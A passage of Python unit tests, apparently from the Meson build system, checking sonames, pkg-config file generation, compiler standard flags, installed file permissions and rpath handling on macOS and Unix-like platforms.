=.*-bitcode_bundle', contents) self.assertIsNone(m, msg=contents) def test_apple_bitcode_modules(self): ''' Same as above, just for shared_module() ''' testdir = os.path.join(self.common_test_dir, '149 shared module resolving symbol in executable') # Ensure that it builds even with bitcode enabled self.init(testdir, extra_args='-Db_bitcode=true') self.build() self.run_tests() def _get_darwin_versions(self, fname): fname = os.path.join(self.builddir, fname) out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True) m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1]) self.assertIsNotNone(m, msg=out) return m.groups() @skipIfNoPkgconfig def test_library_versioning(self): ''' Ensure that compatibility_version and current_version are set correctly ''' testdir = os.path.join(self.platform_test_dir, '2 library versions') self.init(testdir) self.build() targets = {} for t in self.introspect('--targets'): targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename'] self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0')) self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0')) self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0')) self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0')) self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0')) self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0')) self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0')) self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0')) self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1')) def test_duplicate_rpath(self): testdir = os.path.join(self.unit_test_dir, '10 build_rpath') # We purposely pass a duplicate rpath to Meson, in order # to ascertain that Meson does not call install_name_tool # with duplicate -delete_rpath arguments, which would # lead to erroring out on installation env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"} self.init(testdir, override_envvars=env) self.build() self.install() def test_removing_unused_linker_args(self): testdir = os.path.join(self.common_test_dir, '105 has arg') env = {'CFLAGS': '-L/tmp -L /var/tmp -headerpad_max_install_names -Wl,-export_dynamic -framework Foundation'} self.init(testdir, override_envvars=env) @unittest.skipUnless(not is_windows(), "requires something Unix-like") class LinuxlikeTests(BasePlatformTests): ''' Tests that should run on Linux, macOS, and *BSD ''' def test_basic_soname(self): ''' Test that the soname is set correctly for shared libraries. This can't be an ordinary test case because we need to run `readelf` and actually check the soname. https://github.com/mesonbuild/meson/issues/785 ''' testdir = os.path.join(self.common_test_dir, '4 shared') self.init(testdir) self.build() lib1 = os.path.join(self.builddir, 'libmylib.so') soname = get_soname(lib1) self.assertEqual(soname, 'libmylib.so') def test_custom_soname(self): ''' Test that the soname is set correctly for shared libraries when a custom prefix and/or suffix is used. This can't be an ordinary test case because we need to run `readelf` and actually check the soname. https://github.com/mesonbuild/meson/issues/785 ''' testdir = os.path.join(self.common_test_dir, '25 library versions') self.init(testdir) self.build() lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix') soname = get_soname(lib1) self.assertEqual(soname, 'prefixsomelib.suffix') def test_pic(self): ''' Test that -fPIC is correctly added to static libraries when b_staticpic is true and not when it is false. This can't be an ordinary test case because we need to inspect the compiler database. ''' if is_windows() or is_cygwin() or is_osx(): raise unittest.SkipTest('PIC not relevant') testdir = os.path.join(self.common_test_dir, '3 static') self.init(testdir) compdb = self.get_compdb() self.assertIn('-fPIC', compdb[0]['command']) self.setconf('-Db_staticpic=false') # Regenerate build self.build() compdb = self.get_compdb() self.assertNotIn('-fPIC', compdb[0]['command']) @mock.patch.dict(os.environ) def test_pkgconfig_gen(self): ''' Test that generated pkg-config files can be found and have the correct version and link args. This can't be an ordinary test case because we need to run pkg-config outside of a Meson build file. https://github.com/mesonbuild/meson/issues/889 ''' testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen') self.init(testdir) env = get_fake_env(testdir, self.builddir, self.prefix) kwargs = {'required': True, 'silent': True} os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir foo_dep = PkgConfigDependency('libfoo', env, kwargs) self.assertTrue(foo_dep.found()) self.assertEqual(foo_dep.get_version(), '1.0') self.assertIn('-lfoo', foo_dep.get_link_args()) self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar') self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data') libhello_nolib = PkgConfigDependency('libhello_nolib', env, kwargs) self.assertTrue(libhello_nolib.found()) self.assertEqual(libhello_nolib.get_link_args(), []) self.assertEqual(libhello_nolib.get_compile_args(), []) self.assertEqual(libhello_nolib.get_pkgconfig_variable('foo', {}), 'bar') def test_pkgconfig_gen_deps(self): ''' Test that generated pkg-config files correctly handle dependencies ''' testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen') self.init(testdir) privatedir1 = self.privatedir self.new_builddir() testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen', 'dependencies') self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1}) privatedir2 = self.privatedir env = { 'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]), 'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib', } self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env) # pkg-config strips some duplicated flags so we have to parse the # generated file ourself. expected = { 'Requires': 'libexposed', 'Requires.private': 'libfoo >= 1.0', 'Libs': '-L${libdir} -llibmain -pthread -lcustom', 'Libs.private': '-lcustom2 -L${libdir} -llibinternal', 'Cflags': '-I${includedir} -pthread -DCUSTOM', } if is_osx() or is_haiku(): expected['Cflags'] = expected['Cflags'].replace('-pthread ', '') with open(os.path.join(privatedir2, 'dependency-test.pc')) as f: matched_lines = 0 for line in f: parts = line.split(':', 1) if parts[0] in expected: key = parts[0] val = parts[1].strip() expected_val = expected[key] self.assertEqual(expected_val, val) matched_lines += 1 self.assertEqual(len(expected), matched_lines) cmd = ['pkg-config', 'requires-test'] out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n') if not is_openbsd(): self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello'])) else: self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello'])) cmd = ['pkg-config', 'requires-private-test'] out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n') if not is_openbsd(): self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello'])) else: self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello'])) cmd = ['pkg-config', 'pub-lib-order'] out = self._run(cmd + ['--libs'], override_envvars=env).strip().split() self.assertEqual(out, ['-llibmain2', '-llibinternal']) # See common/45 pkgconfig-gen/meson.build for description of the case this test with open(os.path.join(privatedir1, 'simple2.pc')) as f: content = f.read() self.assertIn('Libs: -L${libdir} -lsimple2 -lsimple1', content) self.assertIn('Libs.private: -lz', content) with open(os.path.join(privatedir1, 'simple3.pc')) as f: content = f.read() self.assertEqual(1, content.count('-lsimple3')) with open(os.path.join(privatedir1, 'simple5.pc')) as f: content = f.read() self.assertNotIn('-lstat2', content) @mock.patch.dict(os.environ) def test_pkgconfig_uninstalled(self): testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen') self.init(testdir) self.build() os.environ['PKG_CONFIG_LIBDIR'] = os.path.join(self.builddir, 'meson-uninstalled') if is_cygwin(): os.environ['PATH'] += os.pathsep + self.builddir self.new_builddir() testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen', 'dependencies') self.init(testdir) self.build() self.run_tests() def test_pkg_unfound(self): testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig') self.init(testdir) with open(os.path.join(self.privatedir, 'somename.pc')) as f: pcfile = f.read() self.assertFalse('blub_blob_blib' in pcfile) def test_vala_c_warnings(self): ''' Test that no warnings are emitted for C code generated by Vala. This can't be an ordinary test case because we need to inspect the compiler database. https://github.com/mesonbuild/meson/issues/864 ''' if not shutil.which('valac'): raise unittest.SkipTest('valac not installed.') testdir = os.path.join(self.vala_test_dir, '5 target glib') self.init(testdir) compdb = self.get_compdb() vala_command = None c_command = None for each in compdb: if each['file'].endswith('GLib.Thread.c'): vala_command = each['command'] elif each['file'].endswith('GLib.Thread.vala'): continue elif each['file'].endswith('retcode.c'): c_command = each['command'] else: m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file']) raise AssertionError(m) self.assertIsNotNone(vala_command) self.assertIsNotNone(c_command) # -w suppresses all warnings, should be there in Vala but not in C self.assertIn(" -w ", vala_command) self.assertNotIn(" -w ", c_command) # -Wall enables all warnings, should be there in C but not in Vala self.assertNotIn(" -Wall ", vala_command) self.assertIn(" -Wall ", c_command) # -Werror converts warnings to errors, should always be there since it's # injected by an unrelated piece of code and the project has werror=true self.assertIn(" -Werror ", vala_command) self.assertIn(" -Werror ", c_command) @skipIfNoPkgconfig def test_qtdependency_pkgconfig_detection(self): ''' Test that qt4 and qt5 detection with pkgconfig works. ''' # Verify Qt4 or Qt5 can be found with pkg-config qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore']) qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core']) testdir = os.path.join(self.framework_test_dir, '4 qt') self.init(testdir, extra_args=['-Dmethod=pkg-config']) # Confirm that the dependency was found with pkg-config mesonlog = self.get_meson_log() if qt4 == 0: self.assertRegex('\n'.join(mesonlog), r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n') if qt5 == 0: self.assertRegex('\n'.join(mesonlog), r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n') @skip_if_not_base_option('b_sanitize') def test_generate_gir_with_address_sanitizer(self): if is_cygwin(): raise unittest.SkipTest('asan not available on Cygwin') if is_openbsd(): raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD') testdir = os.path.join(self.framework_test_dir, '7 gnome') self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false']) self.build() def test_qt5dependency_qmake_detection(self): ''' Test that qt5 detection with qmake works. This can't be an ordinary test case because it involves setting the environment. ''' # Verify that qmake is for Qt5 if not shutil.which('qmake-qt5'): if not shutil.which('qmake'): raise unittest.SkipTest('QMake not found') output = subprocess.getoutput('qmake --version') if 'Qt version 5' not in output: raise unittest.SkipTest('Qmake found, but it is not for Qt 5.') # Disable pkg-config codepath and force searching with qmake/qmake-qt5 testdir = os.path.join(self.framework_test_dir, '4 qt') self.init(testdir, extra_args=['-Dmethod=qmake']) # Confirm that the dependency was found with qmake mesonlog = self.get_meson_log() self.assertRegex('\n'.join(mesonlog), r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n') def glob_sofiles_without_privdir(self, g): files = glob(g) return [f for f in files if not f.endswith('.p')] def _test_soname_impl(self, libpath, install): if is_cygwin() or is_osx(): raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames') testdir = os.path.join(self.unit_test_dir, '1 soname') self.init(testdir) self.build() if install: self.install() # File without aliases set. nover = os.path.join(libpath, 'libnover.so') self.assertPathExists(nover) self.assertFalse(os.path.islink(nover)) self.assertEqual(get_soname(nover), 'libnover.so') self.assertEqual(len(self.glob_sofiles_without_privdir(nover[:-3] + '*')), 1) # File with version set verset = os.path.join(libpath, 'libverset.so') self.assertPathExists(verset + '.4.5.6') self.assertEqual(os.readlink(verset), 'libverset.so.4') self.assertEqual(get_soname(verset), 'libverset.so.4') self.assertEqual(len(self.glob_sofiles_without_privdir(verset[:-3] + '*')), 3) # File with soversion set soverset = os.path.join(libpath, 'libsoverset.so') self.assertPathExists(soverset + '.1.2.3') self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3') self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3') self.assertEqual(len(self.glob_sofiles_without_privdir(soverset[:-3] + '*')), 2) # File with version and soversion set to same values settosame = os.path.join(libpath, 'libsettosame.so') self.assertPathExists(settosame + '.7.8.9') self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9') self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9') self.assertEqual(len(self.glob_sofiles_without_privdir(settosame[:-3] + '*')), 2) # File with version and soversion set to different values bothset = os.path.join(libpath, 'libbothset.so') self.assertPathExists(bothset + '.1.2.3') self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3') self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6') self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3') self.assertEqual(len(self.glob_sofiles_without_privdir(bothset[:-3] + '*')), 3) def test_soname(self): self._test_soname_impl(self.builddir, False) def test_installed_soname(self): libdir = self.installdir + os.path.join(self.prefix, self.libdir) self._test_soname_impl(libdir, True) def test_compiler_check_flags_order(self): ''' Test that compiler check flags override all other flags. This can't be an ordinary test case because it needs the environment to be set. ''' testdir = os.path.join(self.common_test_dir, '37 has function') env = get_fake_env(testdir, self.builddir, self.prefix) cpp = env.detect_cpp_compiler(MachineChoice.HOST) Oflag = '-O3' OflagCPP = Oflag if cpp.get_id() in ('clang', 'gcc'): # prevent developers from adding "int main(int argc, char **argv)" # to small Meson checks unless these parameters are actually used OflagCPP += ' -Werror=unused-parameter' env = {'CFLAGS': Oflag, 'CXXFLAGS': OflagCPP} self.init(testdir, override_envvars=env) cmds = self.get_meson_log_compiler_checks() for cmd in cmds: if cmd[0] == 'ccache': cmd = cmd[1:] # Verify that -I flags from the `args` kwarg are first # This is set in the '37 has function' test case self.assertEqual(cmd[1], '-I/tmp') # Verify that -O3 set via the environment is overridden by -O0 Oargs = [arg for arg in cmd if arg.startswith('-O')] self.assertEqual(Oargs, [Oflag, '-O0']) def _test_stds_impl(self, testdir, compiler, p: str): has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0')) has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0')) has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0')) # Check that all the listed -std=xxx options for this compiler work just fine when used # https://en.wikipedia.org/wiki/Xcode#Latest_versions # https://www.gnu.org/software/gcc/projects/cxx-status.html for v in compiler.get_options()['std'].choices: lang_std = p + '_std' # we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly # thus, C++ first if '++17' in v and not has_cpp17: continue elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support continue # now C elif '17' in v and not has_cpp2a_c17: continue elif '18' in v and not has_c18: continue std_opt = '{}={}'.format(lang_std, v) self.init(testdir, extra_args=['-D' + std_opt]) cmd = self.get_compdb()[0]['command'] # c++03 and gnu++03 are not understood by ICC, don't try to look for them skiplist = frozenset([ ('intel', 'c++03'), ('intel', 'gnu++03')]) if v != 'none' and not (compiler.get_id(), v) in skiplist: cmd_std = " -std={} ".format(v) self.assertIn(cmd_std, cmd) try: self.build() except Exception: print('{} was {!r}'.format(lang_std, v)) raise self.wipe() # Check that an invalid std option in CFLAGS/CPPFLAGS fails # Needed because by default ICC ignores invalid options cmd_std = '-std=FAIL' if p == 'c': env_flag_name = 'CFLAGS' elif p == 'cpp': env_flag_name = 'CXXFLAGS' else: raise NotImplementedError('Language {} not defined.'.format(p)) env = {} env[env_flag_name] = cmd_std with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException), msg='C compiler should have failed with -std=FAIL'): self.init(testdir, override_envvars = env) # ICC won't fail in the above because additional flags are needed to # make unknown -std=... options errors. self.build() def test_compiler_c_stds(self): ''' Test that C stds specified for this compiler can all be used. Can't be an ordinary test because it requires passing options to meson. ''' testdir = os.path.join(self.common_test_dir, '1 trivial') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) self._test_stds_impl(testdir, cc, 'c') def test_compiler_cpp_stds(self): ''' Test that C++ stds specified for this compiler can all be used. Can't be an ordinary test because it requires passing options to meson. ''' testdir = os.path.join(self.common_test_dir, '2 cpp') env = get_fake_env(testdir, self.builddir, self.prefix) cpp = env.detect_cpp_compiler(MachineChoice.HOST) self._test_stds_impl(testdir, cpp, 'cpp') def test_unity_subproj(self): testdir = os.path.join(self.common_test_dir, '43 subproject') self.init(testdir, extra_args='--unity=subprojects') pdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/simpletest*.p')) self.assertEqual(len(pdirs), 1) self.assertPathExists(os.path.join(pdirs[0], 'simpletest-unity0.c')) sdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/*sublib*.p')) self.assertEqual(len(sdirs), 1) self.assertPathExists(os.path.join(sdirs[0], 'sublib-unity0.c')) self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c')) self.build() def test_installed_modes(self): ''' Test that files installed by these tests have the correct permissions. Can't be an ordinary test because our installed_files.txt is very basic. ''' # Test file modes testdir = os.path.join(self.common_test_dir, '12 data') self.init(testdir) self.install() f = os.path.join(self.installdir, 'etc', 'etcfile.dat') found_mode = stat.filemode(os.stat(f).st_mode) want_mode = 'rw------T' self.assertEqual(want_mode, found_mode[1:]) f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh') statf = os.stat(f) found_mode = stat.filemode(statf.st_mode) want_mode = 'rwxr-sr-x' self.assertEqual(want_mode, found_mode[1:]) if os.getuid() == 0: # The chown failed nonfatally if we're not root self.assertEqual(0, statf.st_uid) self.assertEqual(0, statf.st_gid) f = os.path.join(self.installdir, 'usr', 'share', 'progname', 'fileobject_datafile.dat') orig = os.path.join(testdir, 'fileobject_datafile.dat') statf = os.stat(f) statorig = os.stat(orig) found_mode = stat.filemode(statf.st_mode) orig_mode = stat.filemode(statorig.st_mode) self.assertEqual(orig_mode[1:], found_mode[1:]) self.assertEqual(os.getuid(), statf.st_uid) if os.getuid() == 0: # The chown failed nonfatally if we're not root self.assertEqual(0, statf.st_gid) self.wipe() # Test directory modes testdir = os.path.join(self.common_test_dir, '60 install subdir') self.init(testdir) self.install() f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat') statf = os.stat(f) found_mode = stat.filemode(statf.st_mode) want_mode = 'rwxr-x--t' self.assertEqual(want_mode, found_mode[1:]) if os.getuid() == 0: # The chown failed nonfatally if we're not root self.assertEqual(0, statf.st_uid) def test_installed_modes_extended(self): ''' Test that files are installed with correct permissions using install_mode. ''' testdir = os.path.join(self.common_test_dir, '191 install_mode') self.init(testdir) self.build() self.install() for fsobj, want_mode in [ ('bin', 'drwxr-x---'), ('bin/runscript.sh', '-rwxr-sr-x'), ('bin/trivialprog', '-rwxr-sr-x'), ('include', 'drwxr-x---'), ('include/config.h', '-rw-rwSr--'), ('include/rootdir.h', '-r--r--r-T'), ('lib', 'drwxr-x---'), ('lib/libstat.a', '-rw---Sr--'), ('share', 'drwxr-x---'), ('share/man', 'drwxr-x---'), ('share/man/man1', 'drwxr-x---'), ('share/man/man1/foo.1', '-r--r--r-T'), ('share/sub1', 'drwxr-x---'), ('share/sub1/second.dat', '-rwxr-x--t'), ('subdir', 'drwxr-x---'), ('subdir/data.dat', '-rw-rwSr--'), ]: f = os.path.join(self.installdir, 'usr', *fsobj.split('/')) found_mode = stat.filemode(os.stat(f).st_mode) self.assertEqual(want_mode, found_mode, msg=('Expected file %s to have mode %s but found %s instead.' % (fsobj, want_mode, found_mode))) # Ensure that introspect --installed works on all types of files # FIXME: also verify the files list self.introspect('--installed') def test_install_umask(self): ''' Test that files are installed with correct permissions using default install umask of 022, regardless of the umask at time the worktree was checked out or the build was executed. ''' # Copy source tree to a temporary directory and change permissions # there to simulate a checkout with umask 002. orig_testdir = os.path.join(self.unit_test_dir, '26 install umask') # Create a new testdir under tmpdir. tmpdir = os.path.realpath(tempfile.mkdtemp()) self.addCleanup(windows_proof_rmtree, tmpdir) testdir = os.path.join(tmpdir, '26 install umask') # Copy the tree using shutil.copyfile, which will use the current umask # instead of preserving permissions of the old tree. save_umask = os.umask(0o002) self.addCleanup(os.umask, save_umask) shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile) # Preserve the executable status of subdir/sayhello though. os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775) self.init(testdir) # Run the build under a 027 umask now. os.umask(0o027) self.build() # And keep umask 027 for the install step too. self.install() for executable in [ 'bin/prog', 'share/subdir/sayhello', ]: f = os.path.join(self.installdir, 'usr', *executable.split('/')) found_mode = stat.filemode(os.stat(f).st_mode) want_mode = '-rwxr-xr-x' self.assertEqual(want_mode, found_mode, msg=('Expected file %s to have mode %s but found %s instead.' % (executable, want_mode, found_mode))) for directory in [ 'usr', 'usr/bin', 'usr/include', 'usr/share', 'usr/share/man', 'usr/share/man/man1', 'usr/share/subdir', ]: f = os.path.join(self.installdir, *directory.split('/')) found_mode = stat.filemode(os.stat(f).st_mode) want_mode = 'drwxr-xr-x' self.assertEqual(want_mode, found_mode, msg=('Expected directory %s to have mode %s but found %s instead.' % (directory, want_mode, found_mode))) for datafile in [ 'include/sample.h', 'share/datafile.cat', 'share/file.dat', 'share/man/man1/prog.1', 'share/subdir/datafile.dog', ]: f = os.path.join(self.installdir, 'usr', *datafile.split('/')) found_mode = stat.filemode(os.stat(f).st_mode) want_mode = '-rw-r--r--' self.assertEqual(want_mode, found_mode, msg=('Expected file %s to have mode %s but found %s instead.' % (datafile, want_mode, found_mode))) def test_cpp_std_override(self): testdir = os.path.join(self.unit_test_dir, '6 std override') self.init(testdir) compdb = self.get_compdb() # Don't try to use -std=c++03 as a check for the # presence of a compiler flag, as ICC does not # support it. for i in compdb: if 'prog98' in i['file']: c98_comp = i['command'] if 'prog11' in i['file']: c11_comp = i['command'] if 'progp' in i['file']: plain_comp = i['command'] self.assertNotEqual(len(plain_comp), 0) self.assertIn('-std=c++98', c98_comp) self.assertNotIn('-std=c++11', c98_comp) self.assertIn('-std=c++11', c11_comp) self.assertNotIn('-std=c++98', c11_comp) self.assertNotIn('-std=c++98', plain_comp) self.assertNotIn('-std=c++11', plain_comp) # Now werror self.assertIn('-Werror', plain_comp) self.assertNotIn('-Werror', c98_comp) def test_run_installed(self): if is_cygwin() or is_osx(): raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable') testdir = os.path.join(self.unit_test_dir, '7 run installed') self.init(testdir) self.build() self.install() installed_exe = os.path.join(self.installdir, 'usr/bin/prog') installed_libdir = os.path.join(self.installdir, 'usr/foo') installed_lib = os.path.join(installed_libdir, 'libfoo.so') self.assertTrue(os.path.isfile(installed_exe)) self.assertTrue(os.path.isdir(installed_libdir)) self.assertTrue(os.path.isfile(installed_lib)) # Must fail when run without LD_LIBRARY_PATH to ensure that # rpath has been properly stripped rather than pointing to the builddir. self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0) # When LD_LIBRARY_PATH is set it should start working. # For some reason setting LD_LIBRARY_PATH in os.environ fails # when all tests are run (but works when only this test is run), # but doing this explicitly works. env = os.environ.copy() env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')]) self.assertEqual(subprocess.call(installed_exe, env=env), 0) # Ensure that introspect --installed works installed = self.introspect('--installed') for v in installed.values(): self.assertTrue('prog' in v or 'foo' in v) @skipIfNoPkgconfig def test_order_of_l_arguments(self): testdir = os.path.join(self.unit_test_dir, '8 -L -l order') self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir}) # NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders # the flags before returning them to -Lfoo -Lbar -lfoo -lbar # but pkgconf seems to not do that. Sigh. Support both. expected_order = [('-L/me/first', '-lfoo1'), ('-L/me/second', '-lfoo2'), ('-L/me/first', '-L/me/second'), ('-lfoo1', '-lfoo2'), ('-L/me/second', '-L/me/third'), ('-L/me/third', '-L/me/fourth',), ('-L/me/third', '-lfoo3'), ('-L/me/fourth', '-lfoo4'), ('-lfoo3', '-lfoo4'), ] with open(os.path.join(self.builddir, 'build.ninja')) as ifile: for line in ifile: if expected_order[0][0] in line: for first, second in expected_order: self.assertLess(line.index(first), line.index(second)) return raise RuntimeError('Linker entries not found in the Ninja file.') def test_introspect_dependencies(self): ''' Tests that mesonintrospect --dependencies returns expected output. ''' testdir = os.path.join(self.framework_test_dir, '7 gnome') self.init(testdir) glib_found = False gobject_found = False deps = self.introspect('--dependencies') self.assertIsInstance(deps, list) for dep in deps: self.assertIsInstance(dep, dict) self.assertIn('name', dep) self.assertIn('compile_args', dep) self.assertIn('link_args', dep) if dep['name'] == 'glib-2.0': glib_found = True elif dep['name'] == 'gobject-2.0': gobject_found = True self.assertTrue(glib_found) self.assertTrue(gobject_found) if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0: raise unittest.SkipTest('glib >= 2.56.2 needed for the rest') targets = self.introspect('--targets') docbook_target = None for t in targets: if t['name'] == 'generated-gdbus-docbook': docbook_target = t break self.assertIsInstance(docbook_target, dict) self.assertEqual(os.path.basename(t['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(t['target_sources'][0]['sources'][0])) def test_introspect_installed(self): testdir = os.path.join(self.linuxlike_test_dir, '7 library versions') self.init(testdir) install = self.introspect('--installed') install = {os.path.basename(k): v for k, v in install.items()} print(install) if is_osx(): the_truth = { 'libmodule.dylib': '/usr/lib/libmodule.dylib', 'libnoversion.dylib': '/usr/lib/libnoversion.dylib', 'libonlysoversion.5.dylib': '/usr/lib/libonlysoversion.5.dylib', 'libonlysoversion.dylib': '/usr/lib/libonlysoversion.dylib', 'libonlyversion.1.dylib': '/usr/lib/libonlyversion.1.dylib', 'libonlyversion.dylib': '/usr/lib/libonlyversion.dylib', 'libsome.0.dylib': '/usr/lib/libsome.0.dylib', 'libsome.dylib': '/usr/lib/libsome.dylib', } the_truth_2 = {'/usr/lib/libsome.dylib', '/usr/lib/libsome.0.dylib', } else: the_truth = { 'libmodule.so': '/usr/lib/libmodule.so', 'libnoversion.so': '/usr/lib/libnoversion.so', 'libonlysoversion.so': '/usr/lib/libonlysoversion.so', 'libonlysoversion.so.5': '/usr/lib/libonlysoversion.so.5', 'libonlyversion.so': '/usr/lib/libonlyversion.so', 'libonlyversion.so.1': '/usr/lib/libonlyversion.so.1', 'libonlyversion.so.1.4.5': '/usr/lib/libonlyversion.so.1.4.5', 'libsome.so': '/usr/lib/libsome.so', 'libsome.so.0': '/usr/lib/libsome.so.0', 'libsome.so.1.2.3': '/usr/lib/libsome.so.1.2.3', } the_truth_2 = {'/usr/lib/libsome.so', '/usr/lib/libsome.so.0', '/usr/lib/libsome.so.1.2.3'} self.assertDictEqual(install, the_truth) targets = self.introspect('--targets') for t in targets: if t['name'] != 'some': continue self.assertSetEqual(the_truth_2, set(t['install_filename'])) def test_build_rpath(self): if is_cygwin(): raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH') testdir = os.path.join(self.unit_test_dir, '10 build_rpath') self.init(testdir) self.build() # C program RPATH build_rpath = get_rpath(os.path.join(self.builddir, 'prog')) self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar') self.install() install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog')) self.assertEqual(install_rpath, '/baz') # C++ program RPATH build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx')) self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar') self.install() install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx')) self.assertEqual(install_rpath, 'baz') def test_global_rpath(self): if is_cygwin(): raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH') if is_osx(): raise unittest.SkipTest('Global RPATHs via LDFLAGS not yet supported on MacOS (does anybody need it?)') testdir = os.path.join(self.unit_test_dir, '81 global-rpath') oldinstalldir = self.installdir # Build and install an external library without DESTDIR. # The external library generates a .pc file without an rpath. yonder_dir = os.path.join(testdir, 'yonder') yonder_prefix = os.path.join(oldinstalldir, 'yonder') yonder_libdir = os.path.join(yonder_prefix, self.libdir) self.prefix = yonder_prefix self.installdir = yonder_prefix self.init(yonder_dir) self.build() self.install(use_destdir=False) # Since rpath has multiple valid formats we need to # test that they are all properly used. rpath_formats = [ ('-Wl,-rpath=', False), ('-Wl,-rpath,', False), ('-Wl,--just-symbols=', True), ('-Wl,--just-symbols,', True), ('-Wl,-R', False), ('-Wl,-R,', False) ] for rpath_format, exception in rpath_formats: # Build an app that uses that installed library. # Supply the rpath to the installed library via LDFLAGS # (as systems like buildroot and guix are wont to do) # and verify install preserves that rpath. self.new_builddir() env = {'LDFLAGS': rpath_format + yonder_libdir, 'PKG_CONFIG_PATH': os.path.join(yonder_libdir, 'pkgconfig')} if exception: with self.assertRaises(subprocess.CalledProcessError): self.init(testdir, override_envvars=env) continue self.init(testdir, override_envvars=env) self.build() self.install(use_destdir=False) got_rpath = get_rpath(os.path.join(yonder_prefix, 'bin/rpathified')) self.assertEqual(got_rpath, yonder_libdir, rpath_format) @skip_if_not_base_option('b_sanitize') def test_pch_with_address_sanitizer(self): if is_cygwin(): raise unittest.SkipTest('asan not available on Cygwin') if is_openbsd(): raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD') testdir = os.path.join(self.common_test_dir, '13 pch') self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false']) self.build() compdb = self.get_compdb() 